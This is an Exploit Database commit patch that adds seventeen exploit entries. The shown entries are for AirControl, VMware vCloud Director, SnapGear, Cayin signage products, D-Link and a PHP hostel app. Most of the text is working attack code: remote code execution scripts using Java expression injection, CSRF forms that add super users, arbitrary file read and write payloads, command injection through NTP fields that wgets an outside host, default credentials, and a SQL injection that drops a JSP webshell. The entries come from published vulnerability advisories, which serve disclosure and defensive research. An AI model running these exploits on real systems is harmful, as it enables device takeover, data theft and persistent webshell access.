From 533f33f3f4702cb4372efaaba23e3c87dd246c81 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 5 Jun 2020 05:01:53 +0000 Subject: [PATCH] DB: 2020-06-05 17 changes to exploits/shellcodes IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path AirControl 1.4.2 - PreAuth Remote Code Execution Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) Clinic Management System 1.0 - Unauthenticated Remote Code Execution Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) Oriol Espinal CMS 1.0 - 'id' SQL Injection Clinic Management System 1.0 - Authenticated Arbitrary File Upload Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Navigate CMS 2.8.7 - Authenticated Directory Traversal D-Link DIR-615 T1 20.10 - CAPTCHA Bypass Online Marriage Registration System 1.0 - Remote Code Execution Cayin Content Management Server 11.0 - Remote Command Injection (root) SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read Cayin Signage Media Player 3.0 - Remote Command Injection (root) Cayin Digital Signage System xPost 2.5 - Remote Command Injection --- exploits/hardware/webapps/48541.py | 30 ++++++ exploits/hardware/webapps/48551.txt | 28 ++++++ exploits/hardware/webapps/48554.txt | 72 ++++++++++++++ exploits/hardware/webapps/48556.txt | 95 +++++++++++++++++++ exploits/java/webapps/48549.py | 138 +++++++++++++++++++++++++++ exploits/multiple/webapps/48553.txt | 139 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48557.py | 130 ++++++++++++++++++++++++++ exploits/multiple/webapps/48558.txt | 121 ++++++++++++++++++++++++ exploits/php/webapps/48542.txt | 20 ++++ exploits/php/webapps/48544.txt | 62 +++++++++++++ exploits/php/webapps/48545.py | 34 +++++++ exploits/php/webapps/48546.txt | 76 +++++++++++++++ exploits/php/webapps/48547.txt | 62 +++++++++++++ exploits/php/webapps/48548.txt | 99 ++++++++++++++++++++ exploits/php/webapps/48550.txt | 29 ++++++ exploits/php/webapps/48552.sh | 52 +++++++++++ exploits/windows/local/48543.txt | 53 +++++++++++ files_exploits.csv | 17 ++++ 18 files changed, 1257 insertions(+) create mode 100755 exploits/hardware/webapps/48541.py create mode 100644 exploits/hardware/webapps/48551.txt create mode 100644 exploits/hardware/webapps/48554.txt create mode 100644 exploits/hardware/webapps/48556.txt create mode 100755 exploits/java/webapps/48549.py create mode 100644 exploits/multiple/webapps/48553.txt create mode 100755 exploits/multiple/webapps/48557.py create mode 100644 exploits/multiple/webapps/48558.txt create mode 100644 exploits/php/webapps/48542.txt create mode 100644 exploits/php/webapps/48544.txt create mode 100755 exploits/php/webapps/48545.py create mode 100644 exploits/php/webapps/48546.txt create mode 100644 exploits/php/webapps/48547.txt create mode 100644 exploits/php/webapps/48548.txt create mode 100644 exploits/php/webapps/48550.txt create mode 100755 exploits/php/webapps/48552.sh create mode 100644 exploits/windows/local/48543.txt diff --git a/exploits/hardware/webapps/48541.py b/exploits/hardware/webapps/48541.py new file mode 100755 index 000000000..ccd4be227 --- /dev/null +++ b/exploits/hardware/webapps/48541.py @@ -0,0 +1,30 @@ +# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution +# Date: 2020-06-03 +# Exploit Author: 0xd0ff9 vs j3ssie +# Vendor Homepage: https://www.ui.com/ +# Software Link: https://www.ui.com/download/#!utilities +# Version: AirControl <= 1.4.2 +# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml + +import requests +import re +import urllib +import sys + + +print """USAGE: python exploit_aircontrol.py [url] [cmd]""" + + +url = sys.argv[1] +cmd = sys.argv[2] + + +burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" +burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} +r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) + +Locat = r.headers["Location"] + +res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) + +print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res) \ No newline at end of file diff --git a/exploits/hardware/webapps/48551.txt b/exploits/hardware/webapps/48551.txt new file mode 100644 index 000000000..18c04755b --- /dev/null +++ b/exploits/hardware/webapps/48551.txt @@ -0,0 +1,28 @@ +# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass +# Date: 2019-10-12 +# Exploit Author: huzaifa hussain +# Vendor Homepage: https://in.dlink.com/ +# Version: DIR-615 T1 ver:20.10 +# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 +# CVE: CVE-2019-17525 + +D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 + +A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING. + +------------------------------------ +D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new. + +ATTACK SCENARIO AND REPRODUCTION STEPS + +1: Find the ROUTER LoginPage. +2: Fill the required login credentials. +3: Fill the CAPTCH properly and Intercept the request in Burpsuit. +4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab +5: Set the payloads on target variables i.e. username & password under Payloads Tab. +5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab. +6: Now hit the start attack and you will find the correct credentials. + +------------------------------------- + +Huzaifa Hussain \ No newline at end of file diff --git a/exploits/hardware/webapps/48554.txt b/exploits/hardware/webapps/48554.txt new file mode 100644 index 000000000..80412aae7 --- /dev/null +++ b/exploits/hardware/webapps/48554.txt @@ -0,0 +1,72 @@ +# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) +# Author: LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5567 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php + + +14.05.2020 + +-- + + +CSRF Add Super User: +-------------------- + + + +
+ + + + + + + + + + + + + + +
+ + + +Result /etc/shadow: + +root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh +sshd:!!:100:65534::/home:/bin/false +clamav:!!:103:65534::/home:/bin/false +testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh \ No newline at end of file diff --git a/exploits/hardware/webapps/48556.txt b/exploits/hardware/webapps/48556.txt new file mode 100644 index 000000000..241b68a4f --- /dev/null +++ b/exploits/hardware/webapps/48556.txt @@ -0,0 +1,95 @@ +# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application allows the currently logged-in user to edit the +configuration files in the system using the CGI executable 'edit_config_files' +in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) +are located in the /etc/config/ directory. An attacker can manipulate +the POST request parameters to escape from the restricted environment +by using absolute path and start reading, writing and deleting arbitrary +files on the system. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5568 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php + + +14.05.2020 + +-- + + +Read: +----- + + +
+ + + + + + +
+ + + + +Write/overwrite/move: +--------------------- + + +
+ + + + + + + + + + +
+ + + + +Delete: +------- + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/java/webapps/48549.py b/exploits/java/webapps/48549.py new file mode 100755 index 000000000..2adda7607 --- /dev/null +++ b/exploits/java/webapps/48549.py @@ -0,0 +1,138 @@ +# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +#!/usr/bin/python + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] can\'t find tenant identifier') + return + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: + print('[!] url for login form was not found') + return + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] orgId not found') + return + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, args.u, args.p, args.c, args.v) \ No newline at end of file diff --git a/exploits/multiple/webapps/48553.txt b/exploits/multiple/webapps/48553.txt new file mode 100644 index 000000000..adbf9fa72 --- /dev/null +++ b/exploits/multiple/webapps/48553.txt @@ -0,0 +1,139 @@ +# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A +Cayin Content Management Server 11.0 Root Remote Command Injection + + +Vendor: CAYIN Technology Co., Ltd. +Product web page: https://www.cayintech.com +Affected version: CMS-SE v11.0 Build 19179 + CMS-SE v11.0 Build 19025 + CMS-SE v11.0 Build 18325 + CMS Station (CMS-SE-LXC) + CMS-60 v11.0 Build 19025 + CMS-40 v9.0 Build 14197 + CMS-40 v9.0 Build 14099 + CMS-40 v9.0 Build 14093 + CMS-20 v9.0 Build 14197 + CMS-20 v9.0 Build 14092 + CMS v8.2 Build 12199 + CMS v8.0 Build 11175 + CMS v7.5 Build 11175 + +Summary: CAYIN Technology provides Digital Signage +solutions, including media players, servers, and +software designed for the DOOH (Digital Out-of-home) +networks. We develop industrial-grade digital signage +appliances and tailored services so you don't have +to do the hard work. + +Desc: CAYIN CMS suffers from an authenticated OS +semi-blind command injection vulnerability using +default credentials. This can be exploited to inject +and execute arbitrary shell commands as the root +user through the 'NTP_Server_IP' HTTP POST parameter +in system.cgi page. + +Tested on: Apache/1.3.42 (Unix) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5570 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php + + +15.05.2020 + +--- + + +Session created with default credentials (webadmin:bctvadmin). + +HTTP POST Request: +----------------- + +POST /cgi-bin/system.cgi HTTP/1.1 +Host: 192.168.1.3 +Content-Length: 201 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Smith +Origin: http://192.168.1.3 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.3/cgi-bin/system.cgi +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 +Connection: close + + +save_system: 1 +system_date: 2020/5/16 06:36:48 +TIMEZONE: 49 +NTP_Service: 1 +NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) +TEST_NTP: 測試 +reboot1: 1 +reboot_sel1: 4 +reboot_sel2: 1 +reboot_sel3: 1 +font_list: ZH_TW + + +Request recorder @ ZSL: +----------------------- + +Origin of HTTP request: 192.168.1.3:61347 +HTTP GET request to vrfy.zeroscience.mk: + +GET / HTTP/1.0 +User-Agent: MyVoiceIsMyPassportVerifyMe +Host: vrfy.zeroscience.mk +Accept: */* +Connection: Keep-Alive + + +PoC script: +----------- + +import requests + +url = "http://192.168.1.3:80/cgi-bin/system.cgi" + +cookies = {"cy_lang": "ZH_TW", + "cy_us": "67176fd7d3d05812008", + "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", + "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", + "WEB_STR_SYSTEM": "SYSTEM_SETTING", + "cy_cgi_tp": "1591206269_15957"} + +headers = {"Cache-Control": "max-age=0", + "Origin": "http://192.168.1.3", + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Smith", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": "http://192.168.1.3/cgi-bin/system.cgi", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close"} + +data = {"save_system": "1", + "system_date": "2020/5/16 06:36:48", + "TIMEZONE": "49", + "NTP_Service": "1", + "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& + "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", + "reboot1": "1", + "reboot_sel1": "4", + "reboot_sel2": "1", + "reboot_sel3": "1", + "font_list": "ZH_TW"} + +requests.post(url, headers=headers, cookies=cookies, data=data) \ No newline at end of file diff --git a/exploits/multiple/webapps/48557.py b/exploits/multiple/webapps/48557.py new file mode 100755 index 000000000..31b0ff35a --- /dev/null +++ b/exploits/multiple/webapps/48557.py @@ -0,0 +1,130 @@ +# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Signage Media Player 3.0 Root Remote Command Injection +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: SMP-8000QD v3.0 +# SMP-8000 v3.0 +# SMP-6000 v3.0 Build 19025 +# SMP-6000 v1.0 Build 14246 +# SMP-6000 v1.0 Build 14199 +# SMP-6000 v1.0 Build 14167 +# SMP-6000 v1.0 Build 14097 +# SMP-6000 v1.0 Build 14090 +# SMP-6000 v1.0 Build 14069 +# SMP-6000 v1.0 Build 14062 +# SMP-4000 v1.0 Build 14098 +# SMP-4000 v1.0 Build 14092 +# SMP-4000 v1.0 Build 14087 +# SMP-2310 v3.0 +# SMP-2300 v3.0 Build 19316 +# SMP-2210 v3.0 Build 19025 +# SMP-2200 v3.0 Build 19029 +# SMP-2200 v3.0 Build 19025 +# SMP-2100 v10.0 Build 16228 +# SMP-2100 v3.0 +# SMP-2000 v1.0 Build 14167 +# SMP-2000 v1.0 Build 14087 +# SMP-1000 v1.0 Build 14099 +# SMP-PROPLUS v1.5 Build 10081 +# SMP-WEBPLUS v6.5 Build 11126 +# SMP-WEB4 v2.0 Build 13073 +# SMP-WEB4 v2.0 Build 11175 +# SMP-WEB4 v1.5 Build 11476 +# SMP-WEB4 v1.5 Build 11126 +# SMP-WEB4 v1.0 Build 10301 +# SMP-300 v1.0 Build 14177 +# SMP-200 v1.0 Build 13080 +# SMP-200 v1.0 Build 12331 +# SMP-PRO4 v1.0 +# SMP-NEO2 v1.0 +# SMP-NEO v1.0 +# +# Summary: CAYIN Technology provides Digital Signage +# solutions, including media players, servers, and +# software designed for the DOOH (Digital Out-of-home) +# networks. We develop industrial-grade digital signage +# appliances and tailored services so you don't have +# to do the hard work. +# +# Desc: CAYIN SMP-xxxx suffers from an authenticated +# OS command injection vulnerability using default +# credentials. This can be exploited to inject and +# execute arbitrary shell commands as the root user +# through the 'NTP_Server_IP' HTTP GET parameter in +# system.cgi and wizard_system.cgi pages. +# +# ----------------------------------------------------- +# $ ./cayin.py 192.168.1.2 id +# uid=0(root) gid=65534(guest) +# # start sshd +# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd +# $ +# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'" +# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN +# tcp 0 0 :::22 :::* LISTEN +# $ ./cayin.py 192.168.1.2 "cat /etc/passwd" +# root:x:0:0:root:/root:/bin/bash +# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin +# sshd:x:1000:0::/dev/null:/sbin/nologin +# $ +# ----------------------------------------------------- +# +# Tested on: CAYIN Technology KT-Linux v0.99 +# Apache/1.3.42 (Unix) +# Apache/1.3.41 (Unix) +# PHP/5.2.5 +# Linux 2.6.37 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5569 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php +# +# +# 15.05.2020 +# + +import requests +import sys#____ +import re#_____ + +if len(sys.argv) < 3: + print("Cayin SMP WebManager Post-Auth RCE") + print("Usage: ./cayin.py [ip] [cmd]") + sys.exit(17) +else: + ip____address = sys.argv[1] + ex____command = sys.argv[2] + +ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f" +ur____identif += (bytes(ip____address, "utf-8")) +ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69" +ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72" +ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65" +ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54" +ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50" +ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f" +ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f" +ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c" +ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72" +ur____identif += b"\x67\x25\x32\x36" ##########" +ur____identif += (bytes(ex____command, "utf-8")) +ur____identif += b"\x25\x32\x36" ##############" + +ht____request = requests.get(ur____identif, auth = ("webadmin", "admin")) +re____outputs = re.search("\n(.*)", ht____request.text, flags = re.S).group().strip("\n") +print(re____outputs) \ No newline at end of file diff --git a/exploits/multiple/webapps/48558.txt b/exploits/multiple/webapps/48558.txt new file mode 100644 index 000000000..0e79390d1 --- /dev/null +++ b/exploits/multiple/webapps/48558.txt @@ -0,0 +1,121 @@ +# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: 2.5.18103 +# 2.0 +# 1.0 +# +# Summary: CAYIN xPost is the web-based application software, which offers a +# combination of essential tools to create rich contents for digital signage in +# different vertical markets. It provides an easy-to-use platform for instant +# data entry and further extends the usage of CAYIN SMP players to meet users' +# requirements of frequent, daily maintenance. +# +# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. +# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp +# is not properly sanitised before being returned to the user or used in SQL queries. +# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code +# and execute SYSTEM commands. +# +# -------------------------------------------------------------------------------- +# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888 +# # Injecting... +# # Executing... +# +# Command: whoami +# +# nt authority\system +# +# +# You have a webshell @ http://192.168.2.1:8888/thricer.jsp +# lqwrm@zslab:~$ +# -------------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 10 Home +# Microsoft Windows 8.1 +# Microsoft Windows Server 2016 +# Microsoft Windows Server 2012 +# Microsoft Windows 7 Ultimate SP1 +# Apache Tomcat/9.0.1 +# MySQL/5.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5571 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php +# +# +# 15.05.2020 +# + +import requests as req +import time as vremeto +import sys as sistemot +import re as regularno + +if len(sistemot.argv) < 2: + print("Cayin xPost 2.5 Pre-Auth SQLi RCE") + print("Usage: ./wayfinder.py ip:port") + sistemot.exit(19) +else: + ip = sistemot.argv[1] + +filename = "thricer.jsp" +urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=" +constr = "-251' UNION ALL SELECT " + +print("# Injecting...") + +cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612" +cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64" +cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0" +cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f" +cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484" +cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c" +cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505" +cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f" +cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657" +cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70" +cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617" +cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050" +cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786" +cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020" +cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757" +cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d" +cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496" +cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561" +cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726" +cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20" +cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746" +cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064" +cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2" +cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a" +cmdjsp += "0a0a" + +columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " +sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -" +mysqli = constr + cmdjsp + columns + sqlwrite +r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True) +vremeto.sleep(1) + +print("# Executing...") + +r = req.get("http://" + ip + "/" + filename + "?cmd=whoami") +clean = regularno.compile("
(.*)
", flags = regularno.S).search(r.text) +clean = clean.group(1).replace("
", "\n") +print(clean) +print("You have a webshell @ http://" + ip + "/" + filename) \ No newline at end of file diff --git a/exploits/php/webapps/48542.txt b/exploits/php/webapps/48542.txt new file mode 100644 index 000000000..227ef4629 --- /dev/null +++ b/exploits/php/webapps/48542.txt @@ -0,0 +1,20 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) +# Date: 2020-06-02 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/hostel-management-system/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 +# Version: 2.0 +# Tested on: Windows 10 - Wamp Server + +--Vulnerable file /full-profile.php + +--Vulnerable code; + $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); + + Id parameter's value is going into sql query directly! + +--Proof Of Concept + + sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" + OR + http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error \ No newline at end of file diff --git a/exploits/php/webapps/48544.txt b/exploits/php/webapps/48544.txt new file mode 100644 index 